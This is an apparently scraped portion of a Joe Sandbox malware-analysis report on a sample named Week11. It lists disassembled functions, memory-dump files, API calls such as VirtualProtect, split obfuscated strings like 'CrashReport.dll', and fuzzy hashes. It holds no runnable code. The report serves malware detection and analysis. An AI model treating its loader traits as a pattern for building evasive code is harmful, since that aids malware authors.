                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 8eda2831473bfe98f7c1474335967e37f3294c2d0b559b026ae08ee61f67e249
                                • Instruction ID: dfe428614fd70bdd0cef406a9c2b7360cb8437dde5c0f67b8ddb5a57a438494e
                                • Opcode Fuzzy Hash: 8eda2831473bfe98f7c1474335967e37f3294c2d0b559b026ae08ee61f67e249
                                • Instruction Fuzzy Hash: EDD134B2D086A89BE7208B24DC44BEABB75EF81300F1141FED44D57682E67D5EC6CB16
                                Function 004153BD Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 366nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 48904c32bebf4e72188fadc1ea8fd8092b2e07f98f90d98a46729c5ef5d9b14c
                                • Instruction ID: 38d378ff760fc7cf00bfdc99d61b068728ee53e393d52e13f68f0f01335c8ffb
                                • Opcode Fuzzy Hash: 48904c32bebf4e72188fadc1ea8fd8092b2e07f98f90d98a46729c5ef5d9b14c
                                • Instruction Fuzzy Hash: 93D134B2D086A88BE7208B24DC44BEABB75EF81300F1141FED44D57682E67D5EC6CB16
                                Function 00415BF4 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 360nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: 143dd6ccf4d79b50f94dcfa26198671efae58d8fef0ee1bb9550ecdefae7407c
                                • Instruction ID: 66760c9ffb211aed5804c93875a196225b66918cac4555018ca68b065f2e8d13
                                • Opcode Fuzzy Hash: 143dd6ccf4d79b50f94dcfa26198671efae58d8fef0ee1bb9550ecdefae7407c
                                • Instruction Fuzzy Hash: 1CE100B1D086A88BE7208B24DC44BEABB71EF92300F1541FED44D57682E6795EC6CF16
                                Function 004153D1 Relevance: 28.4, APIs: 2, Strings: 14, Instructions: 358nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: a4bca64082aca161c6aafd6cf5861b1520f0f3b6e66235bfaa850e627100c707
                                • Instruction ID: 6a14bf4a3eb04cae67c5b51e01bc356d3a9fc6386e4db02237bdbedde460ddb0
                                • Opcode Fuzzy Hash: a4bca64082aca161c6aafd6cf5861b1520f0f3b6e66235bfaa850e627100c707
                                • Instruction Fuzzy Hash: EBD123B2D086A88BE7208B24DC44BEABB75EF91300F1140FED44D57682E67D5EC6CB56
                                Function 004153FB Relevance: 28.3, APIs: 2, Strings: 14, Instructions: 343nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 00415F55
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-813676002
                                • Opcode ID: b529d1c7728bd555803ccc29e80a8c29973263c2cb7f125d19f27881f42af2be
                                • Instruction ID: 5f5209ed909375d2139a258b2c59d0ee9bc9ae30a4be132ece142089bc88a00e
                                • Opcode Fuzzy Hash: b529d1c7728bd555803ccc29e80a8c29973263c2cb7f125d19f27881f42af2be
                                • Instruction Fuzzy Hash: B1D113B1D086A88BE7208B24DC44BEABB75EF92300F1540FED44D57682E67D4EC6CB16
                                Function 0041E805 Relevance: 26.7, APIs: 1, Strings: 14, Instructions: 469COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: C3>7$CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 0-1595673557
                                • Opcode ID: 5cfb5154d0ade87e123fb57decb367e7c11a00f00729d3ee4777719309c7e456
                                • Instruction ID: d022b2152a70e6700430846171d83ef6987ce2c28b84a06d3bfb48d66a714060
                                • Opcode Fuzzy Hash: 5cfb5154d0ade87e123fb57decb367e7c11a00f00729d3ee4777719309c7e456
                                • Instruction Fuzzy Hash: 90129EB4D052688BEB24CB25CC90BEAB7B6FF85304F1481EAD84D97241D6399EC1CF55
                                Function 00414A30 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 344COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-813676002
                                • Opcode ID: 7a3c6dcbb904aaa6f14cf38af0815618f52217235a12e8a03d86a4584ee1ac6c
                                • Instruction ID: df25959187cdc0d00ec56647ca006b026fe1f554ef3b5b137ac4aef6aafe0e35
                                • Opcode Fuzzy Hash: 7a3c6dcbb904aaa6f14cf38af0815618f52217235a12e8a03d86a4584ee1ac6c
                                • Instruction Fuzzy Hash: 62D121B2D082A88BE7208B24DC44BEABB71EF91310F1580FED44D57682D67D5EC6CB56
                                Function 00416050 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 298COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-813676002
                                • Opcode ID: 4ee90e9c2688beda314404b386caaa8f36aa6a0cc7e66dd9ef6e8dd4cfe5ad53
                                • Instruction ID: 34e4525c590ddcfbfe39821ef2b45606b161f9d4a11c1f324315865f6483a5db
                                • Opcode Fuzzy Hash: 4ee90e9c2688beda314404b386caaa8f36aa6a0cc7e66dd9ef6e8dd4cfe5ad53
                                • Instruction Fuzzy Hash: 33C110B1E086A88BE7208B24DC44BEABB71EF91300F1580FED44D57682D6795FC6CB56
                                Function 0041612B Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 249COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$9HHF$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-813676002
                                • Opcode ID: 37d85fc23c7a52cfad42ff725224e54d8b3f6a147d698aa7b85ba97326a2d606
                                • Instruction ID: 5cdbee90e8e9be711707fb62406c117affafcb95e78e99f747a3dcfd54370fdd
                                • Opcode Fuzzy Hash: 37d85fc23c7a52cfad42ff725224e54d8b3f6a147d698aa7b85ba97326a2d606
                                • Instruction Fuzzy Hash: 30A113B1D086A48AF7218B25DC447EABB71EF51300F0580FEC48D57682D67D4BC68B56
                                Function 00416246 Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 316COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 2949231068-3635020934
                                • Opcode ID: c422880fc17018e93efde1bc399ad1ed4e83bea3256ab74e471f716af8335900
                                • Instruction ID: 3aeec92c3109fb574ea902bd1338bc9d1cbacae3b450ecab5661731baad3006d
                                • Opcode Fuzzy Hash: c422880fc17018e93efde1bc399ad1ed4e83bea3256ab74e471f716af8335900
                                • Instruction Fuzzy Hash: D7C1F2B1D042A88AEB208B25CC447EABBB1EF51300F1581FED44D97682E67D4BC6CF56
                                Function 00416468 Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 300COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-3635020934
                                • Opcode ID: f943e6d6021c3cf7b59e30fdd7bee4faca5fe32445c95ffd70ccb8126e4de506
                                • Instruction ID: 8b635cbb95621562d18b193e08c002f6368445e3de0c633ddc3054a69fb55711
                                • Opcode Fuzzy Hash: f943e6d6021c3cf7b59e30fdd7bee4faca5fe32445c95ffd70ccb8126e4de506
                                • Instruction Fuzzy Hash: 8AC122B1D046A88BEB208B25DC44BEABB71EF51300F1181FEC44D97682D63D5BC68F5A
                                Function 00406413 Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 289COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$u@W$y
                                • API String ID: 0-1928072818
                                • Opcode ID: df7aab75b9e505acbaf2c45e01ed366ddfe7124609e422a16814dae3935be05f
                                • Instruction ID: 6392f3a9208d1e8179c5a805427b9ef258a7f36b1befd5b71f5a0c196174c521
                                • Opcode Fuzzy Hash: df7aab75b9e505acbaf2c45e01ed366ddfe7124609e422a16814dae3935be05f
                                • Instruction Fuzzy Hash: FDB103A1E082589AF7208B24CC84BEA7B75FF91300F1481FAD84DA7281D67D5ED5CF66
                                Function 004162E6 Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 251COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-3635020934
                                • Opcode ID: 5b4d4a565777b134b1e5df379a4ab5cc8a49ad89aef3aa43bbe7979389cbafdc
                                • Instruction ID: 95268a50d603b0a11159b566f8c4c9e0da5fb0067bbd7fd0ba00e815549d5fdb
                                • Opcode Fuzzy Hash: 5b4d4a565777b134b1e5df379a4ab5cc8a49ad89aef3aa43bbe7979389cbafdc
                                • Instruction Fuzzy Hash: F2A103B1D086A88AFB208B25DC447EABB71EF51300F1581FEC44D97682D67D4FC68B66
                                Function 0041E6D4 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 238memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: 980d6cd119f2785ed562a14cf89b23516781e85215725645f7f14ae613800458
                                • Instruction ID: 034f64877c1c350d937159032d42a52ac2eab4a46e4d8e0f2cafc8c92848ec2e
                                • Opcode Fuzzy Hash: 980d6cd119f2785ed562a14cf89b23516781e85215725645f7f14ae613800458
                                • Instruction Fuzzy Hash: 01A1D1B1E052689AFB20CB25DC54BEAB6B5EF95300F0480FAD84CA7281D6795FC1CF56
                                Function 0041E5DC Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 214memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041ED15
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: CrashReport.dll$E$P$P$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-670065755
                                • Opcode ID: 398f377b1bc141a49752a8dab1a0a482c54966c61d695a7c2ce11503d5744413
                                • Instruction ID: 7236bf87cbc82dcb22f518eeef784d94e1277f173809f8301387256e240a2ef5
                                • Opcode Fuzzy Hash: 398f377b1bc141a49752a8dab1a0a482c54966c61d695a7c2ce11503d5744413
                                • Instruction Fuzzy Hash: 2091DFB1E052A49FF720CA24DC54BEAB6B5EF95300F0480FAD44C9B681D67A5BC18F56
                                Function 00416481 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 200COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-3635020934
                                • Opcode ID: 11ac20397522a4322e322c6f17a6309db365ad98890f0673c0772b80bb212856
                                • Instruction ID: 4448a334db9ed665aba4fbb0b726f790aa21762421452469d73c0e0e51316350
                                • Opcode Fuzzy Hash: 11ac20397522a4322e322c6f17a6309db365ad98890f0673c0772b80bb212856
                                • Instruction Fuzzy Hash: 8F8115B1D096A88BE7218B25DC447EABB75EF51300F1580FEC44C97682D67D4FC68B26
                                Function 004164E8 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 171COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
